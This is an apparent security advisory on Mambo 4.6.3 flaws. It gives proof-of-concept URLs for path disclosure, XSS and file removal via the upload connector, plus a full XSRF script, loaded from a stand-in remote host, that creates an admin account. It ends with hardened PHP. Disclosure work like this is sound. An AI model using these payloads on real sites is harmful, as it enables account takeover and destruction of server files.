
Mambo 4.6.3 Path Disclosure, XSS , XSRF, DOS

Published: 2008-01-29 00:00:00 (source: vulners.com)
Keywords: mambo, path disclosure, xss, xsrf, dos, remote, browser, exploitation, mysql, database, image manager, remote attacker, denial of service

########################## WwW.BugReport.ir #########################

AmnPardaz Security Research Team

Title: Mambo Vulnerabilities

Vendor: http://mamboserver.com

Bugs: Path Disclosure, XSS, XSRF, DOS

Vulnerable Version: 4.6.3 (prior versions may also be affected)

Exploitation: Remote with browser

Fix Available: No!

################################################################

####################
- Description:
####################

Mambo is an open source, modular web content management system (CMS),
written in PHP with a MySQL database as the backend.

####################
- Vulnerability:
####################

+-> Path Disclosure
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=RenameFile

+-> XSS
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script>

+-> XSRF (the exploit creates an admin account)
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script type=text/javascript src=http://somewhere/test.js></script>

Content of http://somewhere/test.js:

    /*
    Set the desired user, pass, email and the victim's URL, then upload the
    script somewhere on the web.
    */

    window.onload = function() {
        var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
        var gid = 25;
        var user = 'amnpardaz';
        var pass = 'amnpardaz';
        var email = '[email protected]';
        // POST parameters of the com_users "save" task, as the admin user form sends them
        var param = {
            name: user,
            username: user,
            email: email,
            password: pass,
            password2: pass,
            gid: gid,
            block: 0,
            option: 'com_users',
            task: 'save',
            sendEmail: 0
        };

        // Build a hidden form and submit it with the logged-in administrator's session
        var form = document.createElement('form');
        form.action = url;
        form.method = 'post';
        form.target = 'hidden';
        form.style.display = 'none';

        for (var i in param) {
            var input;
            try { // ie
                input = document.createElement('<input name="' + i + '">');
            } catch (e) { // other browsers
                input = document.createElement('input');
                input.name = i;
            }
            input.setAttribute('value', param[i]);
            form.appendChild(input);
        }
        document.body.appendChild(form);
        form.submit();
        location.replace(url);
    }

+-> DOS
"mostlyce component" Image Manager note from Mambo 4.6.3:
Important: In order to utilize the Image Manager functionality you
must create the folder structure shown below in your document root
folder.
Not your Mambo root, your document root! For this installation your
document root is [something].
You can create this structure manually or extract the UserFiles.zip
file included with MOStlyCE at that location.
You can find the UserFiles.zip file at /mambots/editors/mostlyce.

If an administrator follows the above instruction, it is possible for a
remote attacker to remove any file from the server, for example the main
configuration file, which could result in a remote denial of service.
The impact of the vulnerability increases when the administrator does
not remove the "installation" folder (it is common to rename it to
something predictable such as "_installation"); in that case a remote
attacker can delete configuration.php and install a new version of
Mambo on the victim server using a remote database.

Code Snippet:

/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/Commands/FileUpload.php
lines 45-60:

    function run() {
        //If using CGI Upload script, get file info and insert into $_FILE array
        if (
            (sizeof($_FILES)==0) &&
            isset($_GET['file']) &&
            isset($_GET['file']['NewFile']) &&
            is_array($_GET['file']['NewFile'])
        ) {
            if (isset($_GET['file']['NewFile']['name']) && $_GET['file']['NewFile']['size'] && $_GET['file']['NewFile']['tmp_name']) {
                $_FILES['NewFile']['name']=basename(str_replace("\\","/",$_GET['file']['NewFile']['name']));
                $_FILES['NewFile']['size']=$_GET['file']['NewFile']['size'];
                $_FILES['NewFile']['tmp_name']=$_GET['file']['NewFile']['tmp_name'];
            } else {
                $disp="202,'Incomplete file information from upload CGI'";
            }
        }
        ...

lines 163-178:

        //Upload file
        if (is_uploaded_file($_FILES['NewFile']['tmp_name'])) {
            if (move_uploaded_file($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext"))) {
                chmod(($this->real_cwd."/$filename.$ext"),0777);
                $disp="0";
            } else {
                $disp="202,'Failed to upload file, internal error…'";
            }
        } else {
            if (rename($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext"))) {
                chmod(($this->real_cwd."/$filename.$ext"),0777);
                $disp="0";
            } else {
                $disp="202,'Failed to upload file, internal error…'";
            }
        }
        ...

POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=
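The root cause in the snippet above is that the upload handler accepts file metadata from $_GET and, when is_uploaded_file() fails, falls back to rename() on a caller-supplied tmp_name. The following is an added example of a hardened replacement for that run() logic; it is not MOStlyCE or Mambo code, and the names handleFileUpload, $realCwd (the already-validated absolute upload directory) and $allowedExt (the site's extension whitelist) are assumptions.

```php
<?php
// Hardened upload handling (added example, not MOStlyCE/Mambo code).
// Assumes $realCwd is the already-validated absolute upload directory and
// $allowedExt the site's extension whitelist. Returns the same "0" /
// "202,'...'" status strings the original $disp variable carried.
function handleFileUpload(string $realCwd, array $allowedExt): string
{
    // 1. Only trust PHP's own $_FILES array. The original fell back to
    //    $_GET['file']['NewFile'] when $_FILES was empty, which let a plain
    //    GET request name an arbitrary existing file as tmp_name.
    if (!isset($_FILES['NewFile']) || !is_array($_FILES['NewFile'])) {
        return "202,'No file uploaded'";
    }
    $upload = $_FILES['NewFile'];
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return "202,'Upload failed with error code " . (int) $upload['error'] . "'";
    }
    // 2. is_uploaded_file() is the only acceptable proof that tmp_name was
    //    created by this request; there is deliberately no rename() fallback.
    if (!is_uploaded_file($upload['tmp_name'])) {
        return "202,'File was not uploaded via HTTP POST'";
    }
    // 3. Build the destination name ourselves: basename() strips directory
    //    components, the extension must be whitelisted, and the stem is
    //    reduced to a safe character set.
    $name = basename(str_replace('\\', '/', (string) $upload['name']));
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    $stem = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo($name, PATHINFO_FILENAME));
    if ($stem === '' || !in_array($ext, $allowedExt, true)) {
        return "202,'Invalid file name or extension'";
    }
    $dest = rtrim($realCwd, '/') . '/' . $stem . '.' . $ext;
    if (file_exists($dest)) {
        return "202,'File already exists'";
    }
    // 4. move_uploaded_file() itself refuses anything that is not a real
    //    upload, and the stored file is not made world-writable (the
    //    original used chmod 0777).
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        return "202,'Failed to upload file, internal error'";
    }
    chmod($dest, 0644);
    return '0';
}
```

With this shape, a request that supplies file[NewFile][tmp_name] in the query string never reaches a filesystem call, so the configuration.php removal described above is not possible.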

####################